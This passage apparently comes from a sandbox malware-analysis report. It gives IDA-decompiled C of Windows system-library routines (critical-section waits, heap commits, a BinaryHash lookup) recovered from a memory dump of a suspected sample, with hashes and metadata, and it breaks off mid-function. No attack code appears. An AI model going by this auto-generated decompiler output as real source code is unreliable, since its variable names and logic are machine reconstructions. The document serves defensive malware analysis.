                                                                                                            0x0109fc61
                                                                                                            0x00000000
                                                                                                            0x0109fc5a
                                                                                                            0x0109fc49
                                                                                                            0x0109fc41
                                                                                                            0x0109fc30
                                                                                                            0x0109fc27
                                                                                                            0x0109fc03
                                                                                                            0x0109fbcd
                                                                                                            0x0109fbd3
                                                                                                            0x0109fbd9
                                                                                                            0x0109fbdc
                                                                                                            0x0109fbde
                                                                                                            0x0109fc99
                                                                                                            0x0109fc9b
                                                                                                            0x0109fc9d
                                                                                                            0x0109fcd5
                                                                                                            0x0109fcd5
                                                                                                            0x0109fc89
                                                                                                            0x0109fc89
                                                                                                            0x00000000
                                                                                                            0x0109fc9f
                                                                                                            0x0109fc9f
                                                                                                            0x0109fca3
                                                                                                            0x00000000
                                                                                                            0x0109fca3
                                                                                                            0x00000000
                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe4
                                                                                                            0x0109fbe9
                                                                                                            0x0109fbf2
                                                                                                            0x00000000
                                                                                                            0x0109fbf2
                                                                                                            0x0109fbde
                                                                                                            0x0109fbcb
                                                                                                            0x0109fbab
                                                                                                            0x0109fc8b
                                                                                                            0x0109fc8b
                                                                                                            0x0109fc8c
                                                                                                            0x0109fb80
                                                                                                            0x0109fb72
                                                                                                            0x0109fb5e
                                                                                                            0x0109fc8d
                                                                                                            0x0109fc91
                                                                                                            0x0109fadf
                                                                                                            0x0109fadf
                                                                                                            0x0109fae1
                                                                                                            0x0109fae4
                                                                                                            0x0109fae7
                                                                                                            0x0109faec
                                                                                                            0x0109faf8
                                                                                                            0x0109fb00
                                                                                                            0x0109fb07
                                                                                                            0x0109fb0f
                                                                                                            0x0109fb0f
                                                                                                            0x0109fb07
                                                                                                            0x00000000
                                                                                                            0x0109faf8
                                                                                                            0x0109fadd

                                                                                                            Strings
                                                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 010DBE0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                            • API String ID: 0-865735534
                                                                                                            • Opcode ID: f24d31902a5ae37d4be1a0d1a29ad0ed4de10322ed676dd16f31c89ba6f83f4f
                                                                                                            • Instruction ID: 41557699471d399608ac63f1dd6cf7bdcb2a90e6e111e96d3a2b6b225112896e
                                                                                                            • Opcode Fuzzy Hash: f24d31902a5ae37d4be1a0d1a29ad0ed4de10322ed676dd16f31c89ba6f83f4f
                                                                                                            • Instruction Fuzzy Hash: 51A11471B0074B8BEB65DF68C4607BEBBE5AF49710F0585A9E992CB680DB30D8419B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E01062D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                                            				signed char _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed int _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				signed int _v52;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t55;
                                                                                                            				signed int _t57;
                                                                                                            				signed int _t58;
                                                                                                            				char* _t62;
                                                                                                            				signed char* _t63;
                                                                                                            				signed char* _t64;
                                                                                                            				signed int _t67;
                                                                                                            				signed int _t72;
                                                                                                            				signed int _t77;
                                                                                                            				signed int _t78;
                                                                                                            				signed int _t88;
                                                                                                            				intOrPtr _t89;
                                                                                                            				signed char _t93;
                                                                                                            				signed int _t97;
                                                                                                            				signed int _t98;
                                                                                                            				signed int _t102;
                                                                                                            				signed int _t103;
                                                                                                            				intOrPtr _t104;
                                                                                                            				signed int _t105;
                                                                                                            				signed int _t106;
                                                                                                            				signed char _t109;
                                                                                                            				signed int _t111;
                                                                                                            				void* _t116;
                                                                                                            
                                                                                                            				_t102 = __edi;
                                                                                                            				_t97 = __edx;
                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                            				_t55 =  *[fs:0x18];
                                                                                                            				_t109 = __ecx;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t86 = 0;
                                                                                                            				_v32 = _t55;
                                                                                                            				_v24 = 0;
                                                                                                            				_push(__edi);
                                                                                                            				if(__ecx == 0x1155350) {
                                                                                                            					_t86 = 1;
                                                                                                            					_v24 = 1;
                                                                                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                                            				}
                                                                                                            				_t103 = _t102 | 0xffffffff;
                                                                                                            				if( *0x1157bc8 != 0) {
                                                                                                            					_push(0xc000004b);
                                                                                                            					_push(_t103);
                                                                                                            					E010A97C0();
                                                                                                            				}
                                                                                                            				if( *0x11579c4 != 0) {
                                                                                                            					_t57 = 0;
                                                                                                            				} else {
                                                                                                            					_t57 = 0x11579c8;
                                                                                                            				}
                                                                                                            				_v16 = _t57;
                                                                                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                                            					_t93 = _t109;
                                                                                                            					L23();
                                                                                                            				}
                                                                                                            				_t58 =  *_t109;
                                                                                                            				if(_t58 == _t103) {
                                                                                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                                            					_t58 = _t103;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						_t93 = _t109;
                                                                                                            						E01091624(_t86, __eflags);
                                                                                                            						_t58 =  *_t109;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                            				if(_t58 != _t103) {
                                                                                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                                            				}
                                                                                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                                            				_t88 = _v16;
                                                                                                            				_v28 = _t104;
                                                                                                            				L9:
                                                                                                            				while(1) {
                                                                                                            					if(E01087D50() != 0) {
                                                                                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                                            					} else {
                                                                                                            						_t62 = 0x7ffe0382;
                                                                                                            					}
                                                                                                            					if( *_t62 != 0) {
                                                                                                            						_t63 =  *[fs:0x30];
                                                                                                            						__eflags = _t63[0x240] & 0x00000002;
                                                                                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                                            							_t93 = _t109;
                                                                                                            							E010FFE87(_t93);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t104 != 0xffffffff) {
                                                                                                            						_push(_t88);
                                                                                                            						_push(0);
                                                                                                            						_push(_t104);
                                                                                                            						_t64 = E010A9520();
                                                                                                            						goto L15;
                                                                                                            					} else {
                                                                                                            						while(1) {
                                                                                                            							_t97 =  &_v8;
                                                                                                            							_t64 = E0109E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                                            							if(_t64 == 0x102) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t93 =  *(_t109 + 4);
                                                                                                            							_v8 = _t93;
                                                                                                            							if((_t93 & 0x00000002) != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							L15:
                                                                                                            							if(_t64 == 0x102) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t89 = _v24;
                                                                                                            							if(_t64 < 0) {
                                                                                                            								L010BDF30(_t93, _t97, _t64);
                                                                                                            								_push(_t93);
                                                                                                            								_t98 = _t97 | 0xffffffff;
                                                                                                            								__eflags =  *0x1156901;
                                                                                                            								_push(_t109);
                                                                                                            								_v52 = _t98;
                                                                                                            								if( *0x1156901 != 0) {
                                                                                                            									_push(0);
                                                                                                            									_push(1);
                                                                                                            									_push(0);
                                                                                                            									_push(0x100003);
                                                                                                            									_push( &_v12);
                                                                                                            									_t72 = E010A9980();
                                                                                                            									__eflags = _t72;
                                                                                                            									if(_t72 < 0) {
                                                                                                            										_v12 = _t98 | 0xffffffff;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								asm("lock cmpxchg [ecx], edx");
                                                                                                            								_t111 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								if(0 != 0) {
                                                                                                            									__eflags = _v12 - 0xffffffff;
                                                                                                            									if(_v12 != 0xffffffff) {
                                                                                                            										_push(_v12);
                                                                                                            										E010A95D0();
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t111 = _v12;
                                                                                                            								}
                                                                                                            								return _t111;
                                                                                                            							} else {
                                                                                                            								if(_t89 != 0) {
                                                                                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                                            									_t77 = E01087D50();
                                                                                                            									__eflags = _t77;
                                                                                                            									if(_t77 == 0) {
                                                                                                            										_t64 = 0x7ffe0384;
                                                                                                            									} else {
                                                                                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                            									}
                                                                                                            									__eflags =  *_t64;
                                                                                                            									if( *_t64 != 0) {
                                                                                                            										_t64 =  *[fs:0x30];
                                                                                                            										__eflags = _t64[0x240] & 0x00000004;
                                                                                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                                            											_t78 = E01087D50();
                                                                                                            											__eflags = _t78;
                                                                                                            											if(_t78 == 0) {
                                                                                                            												_t64 = 0x7ffe0385;
                                                                                                            											} else {
                                                                                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                            											}
                                                                                                            											__eflags =  *_t64 & 0x00000020;
                                                                                                            											if(( *_t64 & 0x00000020) != 0) {
                                                                                                            												_t64 = E010E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								return _t64;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t97 = _t88;
                                                                                                            						_t93 = _t109;
                                                                                                            						E010FFDDA(_t97, _v12);
                                                                                                            						_t105 =  *_t109;
                                                                                                            						_t67 = _v12 + 1;
                                                                                                            						_v12 = _t67;
                                                                                                            						__eflags = _t105 - 0xffffffff;
                                                                                                            						if(_t105 == 0xffffffff) {
                                                                                                            							_t106 = 0;
                                                                                                            							__eflags = 0;
                                                                                                            						} else {
                                                                                                            							_t106 =  *(_t105 + 0x14);
                                                                                                            						}
                                                                                                            						__eflags = _t67 - 2;
                                                                                                            						if(_t67 > 2) {
                                                                                                            							__eflags = _t109 - 0x1155350;
                                                                                                            							if(_t109 != 0x1155350) {
                                                                                                            								__eflags = _t106 - _v20;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t93 = _t109;
                                                                                                            									E010FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_push("RTL: Re-Waiting\n");
                                                                                                            						_push(0);
                                                                                                            						_push(0x65);
                                                                                                            						_v20 = _t106;
                                                                                                            						E010F5720();
                                                                                                            						_t104 = _v28;
                                                                                                            						_t116 = _t116 + 0xc;
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}





































                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RTL: Re-Waiting
                                                                                                            • API String ID: 0-316354757
                                                                                                            • Opcode ID: 79950419a14a1ea8718c13f20f54570a35183327f0f6fc7e85dcddf4f242077d
                                                                                                            • Instruction ID: b767d15035504bcc459a435270e6237623f4ac9abdadbcadbcba9ac3fee33726
                                                                                                            • Opcode Fuzzy Hash: 79950419a14a1ea8718c13f20f54570a35183327f0f6fc7e85dcddf4f242077d
                                                                                                            • Instruction Fuzzy Hash: DC612471A00606DFDB26EF6CCC80BBEBBE9EB44714F1442A9D9D1A72C1C7349940C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E01130EA5(void* __ecx, void* __edx) {
                                                                                                            				signed int _v20;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				unsigned int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				char _v44;
                                                                                                            				intOrPtr _v64;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed int _t58;
                                                                                                            				unsigned int _t60;
                                                                                                            				intOrPtr _t62;
                                                                                                            				char* _t67;
                                                                                                            				char* _t69;
                                                                                                            				void* _t80;
                                                                                                            				void* _t83;
                                                                                                            				intOrPtr _t93;
                                                                                                            				intOrPtr _t115;
                                                                                                            				char _t117;
                                                                                                            				void* _t120;
                                                                                                            
                                                                                                            				_t83 = __edx;
                                                                                                            				_t117 = 0;
                                                                                                            				_t120 = __ecx;
                                                                                                            				_v44 = 0;
                                                                                                            				if(E0112FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                                            					L24:
                                                                                                            					_t109 = _v44;
                                                                                                            					if(_v44 != 0) {
                                                                                                            						E01131074(_t83, _t120, _t109, _t117, _t117);
                                                                                                            					}
                                                                                                            					L26:
                                                                                                            					return _t117;
                                                                                                            				}
                                                                                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                            				_t5 = _t83 + 1; // 0x1
                                                                                                            				_v36 = _t5 << 0xc;
                                                                                                            				_v40 = _t93;
                                                                                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                                            				asm("sbb ebx, ebx");
                                                                                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                                            				if(_t58 != 0) {
                                                                                                            					_push(0);
                                                                                                            					_push(0x14);
                                                                                                            					_push( &_v24);
                                                                                                            					_push(3);
                                                                                                            					_push(_t93);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_t80 = E010A9730();
                                                                                                            					_t115 = _v64;
                                                                                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                                            						_push(_t93);
                                                                                                            						E0112A80D(_t115, 1, _v20, _t117);
                                                                                                            						_t83 = 4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(E0112A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                                            					goto L24;
                                                                                                            				}
                                                                                                            				_t60 = _v32;
                                                                                                            				_t97 = (_t60 != 0x100000) + 1;
                                                                                                            				_t83 = (_v44 -  *0x1158b04 >> 0x14) + (_v44 -  *0x1158b04 >> 0x14);
                                                                                                            				_v28 = (_t60 != 0x100000) + 1;
                                                                                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                                            				_v40 = _t62;
                                                                                                            				if(_t83 >= _t62) {
                                                                                                            					L10:
                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t67 = 0x7ffe0380;
                                                                                                            					} else {
                                                                                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            					}
                                                                                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                            						E0112138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                                            					}
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t69 = 0x7ffe0388;
                                                                                                            					} else {
                                                                                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            					}
                                                                                                            					if( *_t69 != 0) {
                                                                                                            						E0111FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                                            					}
                                                                                                            					if(( *0x1158724 & 0x00000008) != 0) {
                                                                                                            						E011252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                                            					}
                                                                                                            					_t117 = _v44;
                                                                                                            					goto L26;
                                                                                                            				}
                                                                                                            				while(E011315B5(0x1158ae4, _t83, _t97, _t97) >= 0) {
                                                                                                            					_t97 = _v28;
                                                                                                            					_t83 = _t83 + 2;
                                                                                                            					if(_t83 < _v40) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				goto L24;
                                                                                                            			}


                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `
                                                                                                            • API String ID: 0-2679148245
                                                                                                            • Opcode ID: 703ab67a5296e5d42c0b9aa19d2fc1fc675e848e34e587417454339d584ed16f
                                                                                                            • Instruction ID: d27d49896c51df561732373f20d4253f17e1b8c126b545e02b90e7fa6b42bd88
                                                                                                            • Opcode Fuzzy Hash: 703ab67a5296e5d42c0b9aa19d2fc1fc675e848e34e587417454339d584ed16f
                                                                                                            • Instruction Fuzzy Hash: AA51A3713083429FD329DF28D984B5BBBE9EBC4714F14092CF99697294D771E805CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E0109F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				char* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v44;
                                                                                                            				char _v52;
                                                                                                            				intOrPtr _v56;
                                                                                                            				char _v60;
                                                                                                            				intOrPtr _v72;
                                                                                                            				void* _t51;
                                                                                                            				void* _t58;
                                                                                                            				signed short _t82;
                                                                                                            				short _t84;
                                                                                                            				signed int _t91;
                                                                                                            				signed int _t100;
                                                                                                            				signed short* _t103;
                                                                                                            				void* _t108;
                                                                                                            				intOrPtr* _t109;
                                                                                                            
                                                                                                            				_t103 = __ecx;
                                                                                                            				_t82 = __edx;
                                                                                                            				_t51 = E01084120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                                            				if(_t51 >= 0) {
                                                                                                            					_push(0x21);
                                                                                                            					_push(3);
                                                                                                            					_v56 =  *0x7ffe02dc;
                                                                                                            					_v20 =  &_v52;
                                                                                                            					_push( &_v44);
                                                                                                            					_v28 = 0x18;
                                                                                                            					_push( &_v28);
                                                                                                            					_push(0x100020);
                                                                                                            					_v24 = 0;
                                                                                                            					_push( &_v60);
                                                                                                            					_v16 = 0x40;
                                                                                                            					_v12 = 0;
                                                                                                            					_v8 = 0;
                                                                                                            					_t58 = E010A9830();
                                                                                                            					_t87 =  *[fs:0x30];
                                                                                                            					_t108 = _t58;
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                                            					if(_t108 < 0) {
                                                                                                            						L11:
                                                                                                            						_t51 = _t108;
                                                                                                            					} else {
                                                                                                            						_push(4);
                                                                                                            						_push(8);
                                                                                                            						_push( &_v36);
                                                                                                            						_push( &_v44);
                                                                                                            						_push(_v60);
                                                                                                            						_t108 = E010A9990();
                                                                                                            						if(_t108 < 0) {
                                                                                                            							L10:
                                                                                                            							_push(_v60);
                                                                                                            							E010A95D0();
                                                                                                            							goto L11;
                                                                                                            						} else {
                                                                                                            							_t109 = L01084620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                                            							if(_t109 == 0) {
                                                                                                            								_t108 = 0xc0000017;
                                                                                                            								goto L10;
                                                                                                            							} else {
                                                                                                            								_t21 = _t109 + 0x18; // 0x18
                                                                                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                                            								 *_t109 = 1;
                                                                                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                                            								 *(_t109 + 0xe) = _t82;
                                                                                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                                            								E010AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                                            								_t91 =  *_t103 & 0x0000ffff;
                                                                                                            								_t100 = _t91 & 0xfffffffe;
                                                                                                            								_t84 = 0x5c;
                                                                                                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                                            										_push(_v60);
                                                                                                            										E010A95D0();
                                                                                                            										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                                            										_t51 = 0xc0000106;
                                                                                                            									} else {
                                                                                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                                            										goto L5;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									L5:
                                                                                                            									 *_a4 = _t109;
                                                                                                            									_t51 = 0;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t51;
                                                                                                            			}


























                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                            • Instruction ID: 58f28938df67229c75e49668843089368115f450965a86a7a0551dadcf451daa
                                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                            • Instruction Fuzzy Hash: BC517A71604712AFC320DF69C840A6BBBF8FF48714F00892EFA9587690E7B4E914CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E010E3540(intOrPtr _a4) {
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v88;
                                                                                                            				intOrPtr _v92;
                                                                                                            				char _v96;
                                                                                                            				char _v352;
                                                                                                            				char _v1072;
                                                                                                            				intOrPtr _v1140;
                                                                                                            				intOrPtr _v1148;
                                                                                                            				char _v1152;
                                                                                                            				char _v1156;
                                                                                                            				char _v1160;
                                                                                                            				char _v1164;
                                                                                                            				char _v1168;
                                                                                                            				char* _v1172;
                                                                                                            				short _v1174;
                                                                                                            				char _v1176;
                                                                                                            				char _v1180;
                                                                                                            				char _v1192;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				short _t41;
                                                                                                            				short _t42;
                                                                                                            				intOrPtr _t80;
                                                                                                            				intOrPtr _t81;
                                                                                                            				signed int _t82;
                                                                                                            				void* _t83;
                                                                                                            
                                                                                                            				_v12 =  *0x115d360 ^ _t82;
                                                                                                            				_t41 = 0x14;
                                                                                                            				_v1176 = _t41;
                                                                                                            				_t42 = 0x16;
                                                                                                            				_v1174 = _t42;
                                                                                                            				_v1164 = 0x100;
                                                                                                            				_v1172 = L"BinaryHash";
                                                                                                            				_t81 = E010A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                                            				if(_t81 < 0) {
                                                                                                            					L11:
                                                                                                            					_t75 = _t81;
                                                                                                            					E010E3706(0, _t81, _t79, _t80);
                                                                                                            					L12:
                                                                                                            					if(_a4 != 0xc000047f) {
                                                                                                            						E010AFA60( &_v1152, 0, 0x50);
                                                                                                            						_v1152 = 0x60c201e;
                                                                                                            						_v1148 = 1;
                                                                                                            						_v1140 = E010E3540;
                                                                                                            						E010AFA60( &_v1072, 0, 0x2cc);
                                                                                                            						_push( &_v1072);
                                                                                                            						E010BDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                                            						E010F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                                            						_push(_v1152);
                                                                                                            						_push(0xffffffff);
                                                                                                            						E010A97C0();
                                                                                                            					}
                                                                                                            					return E010AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                                            				}
                                                                                                            				_t79 =  &_v352;
                                                                                                            				_t81 = E010E3971(0, _a4,  &_v352,  &_v1156);
                                                                                                            				if(_t81 < 0) {
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            				_t75 = _v1156;
                                                                                                            				_t79 =  &_v1160;
                                                                                                            				_t81 = E010E3884(_v1156,  &_v1160,  &_v1168);
                                                                                                            				if(_t81 >= 0) {
                                                                                                            					_t80 = _v1160;
                                                                                                            					E010AFA60( &_v96, 0, 0x50);
                                                                                                            					_t83 = _t83 + 0xc;
                                                                                                            					_push( &_v1180);
                                                                                                            					_push(0x50);
                                                                                                            					_push( &_v96);
                                                                                                            					_push(2);
                                                                                                            					_push( &_v1176);
                                                                                                            					_push(_v1156);
                                                                                                            					_t81 = E010A9650();
                                                                                                            					if(_t81 >= 0) {
                                                                                                            						if(_v92 != 3 || _v88 == 0) {
                                                                                                            							_t81 = 0xc000090b;
                                                                                                            						}
                                                                                                            						if(_t81 >= 0) {
                                                                                                            							_t75 = _a4;
                                                                                                            							_t79 =  &_v352;
                                                                                                            							E010E3787(_a4,  &_v352, _t80);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                                            				}
                                                                                                            				_push(_v1156);
                                                                                                            				E010A95D0();
                                                                                                            				if(_t81 >= 0) {
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            			}































                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: BinaryHash
                                                                                                            • API String ID: 0-2202222882
                                                                                                            • Opcode ID: 1403b95bed5ea69fd69982d407295003e548e3b8572f942bb99b3e95fa3013d6
                                                                                                            • Instruction ID: e9c599577d742cbe29fa4a030e87f8e61d8e09546b401c8f248bd7f2a7eb0a60
                                                                                                            • Opcode Fuzzy Hash: 1403b95bed5ea69fd69982d407295003e548e3b8572f942bb99b3e95fa3013d6
                                                                                                            • Instruction Fuzzy Hash: 364145F190052D9FDB21DAA0CC85FDEBBBCAB54714F4045A5E649AB240DB319E88CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E011305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                            				signed int _v20;
                                                                                                            				char _v24;
                                                                                                            				signed int _v28;
                                                                                                            				char _v32;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				void* __ebx;
                                                                                                            				void* _t35;
                                                                                                            				signed int _t42;
                                                                                                            				char* _t48;
                                                                                                            				signed int _t59;
                                                                                                            				signed char _t61;
                                                                                                            				signed int* _t79;
                                                                                                            				void* _t88;
                                                                                                            
                                                                                                            				_v28 = __edx;
                                                                                                            				_t79 = __ecx;
                                                                                                            				if(E011307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                                            					L13:
                                                                                                            					_t35 = 0;
                                                                                                            					L14:
                                                                                                            					return _t35;
                                                                                                            				}
                                                                                                            				_t61 = __ecx[1];
                                                                                                            				_t59 = __ecx[0xf];
                                                                                                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                                            				_v36 = _a8 << 0xc;
                                                                                                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                                            				asm("sbb esi, esi");
                                                                                                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                                            				if(_t42 != 0) {
                                                                                                            					_push(0);
                                                                                                            					_push(0x14);
                                                                                                            					_push( &_v24);
